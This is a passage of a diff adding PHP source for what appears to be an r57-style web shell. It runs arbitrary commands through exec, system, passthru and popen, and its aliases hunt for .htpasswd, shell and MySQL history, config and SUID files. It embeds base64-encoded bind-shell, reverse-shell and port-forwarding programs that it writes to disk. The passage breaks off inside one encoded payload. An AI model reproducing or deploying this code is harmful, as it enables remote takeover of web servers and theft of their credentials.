+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text77'=>'Show database structure',
+'eng_text78'=>'show tables',
+'eng_text79'=>'show columns',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL queryaliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find / -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2 = " ::</div></b></font></td></tr><tr><td>";
+$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Wingdings color=gray>&#1080;</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+ {
+ if(@eregi("^win",$os)) { $windows = 1; }
+ else { $unix = 1; }
+ }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+ {
+ echo $head;
+ if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+ else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+ $sr->SearchText(0,0);
+ $res = $sr->GetResultFiles();
+ $found = $sr->GetMatchesCount();
+ $titles = $sr->GetTitles();
+ $r = "";
+ if($found > 0)
+ {
+ $r .= "<TABLE width=100%>";
+ foreach($res as $file=>$v)
+ {
+ $r .= "<TR>";
+ $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+ $r .= ($windows)? str_replace("/","\\",$file) : $file;
+ $r .= "</b></font></ TD>";
+ $r .= "</TR>";
+ foreach($v as $a=>$b)
+ {
+ $r .= "<TR>";
+ $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+ $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+ $r .= "</TR>\n";
+ }
+ }
+ $r .= "</TABLE>";
+ echo $r;
+ }
+ else
+ {
+ echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+ }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+ die();
+ }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+ if(function_exists('exec'))
+ {
+ @exec($cfe,$res);
+ $res = join("\n",$res);
+ }
+ elseif(function_exists('shell_exec'))
+ {
+ $res = @shell_exec($cfe);
+ }
+ elseif(function_exists('system'))
+ {
+ @ob_start();
+ @system($cfe);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ elseif(function_exists('passthru'))
+ {
+ @ob_start();
+ @passthru($cfe);
+ $res = @ob_get_contents();
+ @ob_end_clean();
+ }
+ elseif(@is_resource($f = @popen($cfe,"r")))
+ {
+ $res = "";
+ while(!@feof($f)) { $res .= @fread($f,1024); }
+ @pclose($f);
+ }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1079;&#1072;&#1087;&#1080;&#1089;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] ERROR! Can't write in file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1087;&#1088;&#1086;&#1095;&#1080;&#1090;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] ERROR! Can't read file "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "&#1053;&#1077; &#1091;&#1076;&#1072;&#1083;&#1086;&#1089;&#1100; &#1089;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100; "; }
+else { $text = "Can't create "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+ {
+ $files = Array();
+ if(($handle = @opendir($dir)))
+ {
+ while (FALSE !== ($file = @readdir($handle)))
+ {
+ if ($file != "." && $file != "..")
+ {
+ if(!is_dir($dir."/".$file))
+ {
+ if($types)
+ {
+ $pos = @strrpos($file,".");
+ $ext = @substr($file,$pos,@strlen($file)-$pos);
+ if(@in_array($ext,@explode(';',$types)))
+ $files[] = $dir."/".$file;
+ }
+ else
+ $files[] = $dir."/".$file;
+ }
+ }
+ }
+ @closedir($handle);
+ }
+ return $files;
+ }
+ function DirFilesWide($dir)
+ {
+ $files = Array();
+ $dirs = Array();
+ if(($handle = @opendir($dir)))
+ {
+ while (false !== ($file = @readdir($handle)))
+ {
+ if ($file != "." && $file != "..")
+ {
+ if(@is_dir($dir."/".$file))
+ {
+ $file = @strtoupper($file);
+ $dirs[$file] = '&lt;DIR&gt;';
+ }
+ else
+ $files[$file] = @filesize($dir."/".$file);
+ }
+ }
+ @closedir($handle);
+ @ksort($dirs);
+ @ksort($files);
+ $files = @array_merge($dirs,$files);
+ }
+ return $files;
+ }
+ function DirFilesR($dir,$types='')
+ {
+ $files = Array();
+ if(($handle = @opendir($dir)))
+ {
+ while (false !== ($file = @readdir($handle)))
+ {
+ if ($file != "." && $file != "..")
+ {
+ if(@is_dir($dir."/".$file))
+ $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+ else
+ {
+ $pos = @strrpos($file,".");
+ $ext = @substr($file,$pos,@strlen($file)-$pos);
+ if($types)
+ {
+ if(@in_array($ext,explode(';',$types)))
+ $files[] = $dir."/".$file;
+ }
+ else
+ $files[] = $dir."/".$file;
+ }
+ }
+ }
+ @closedir($handle);
+ }
+ return $files;
+ }
+ function DirPrintHTMLHeaders($dir)
+ {
+ $pockets = '';
+ $handle = @opendir($dir) or die("Can't open directory $dir");
+ echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+ while (false !== ($file = @readdir($handle)))
+ {
+ if ($file != "."
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) 
+ { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ 
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL 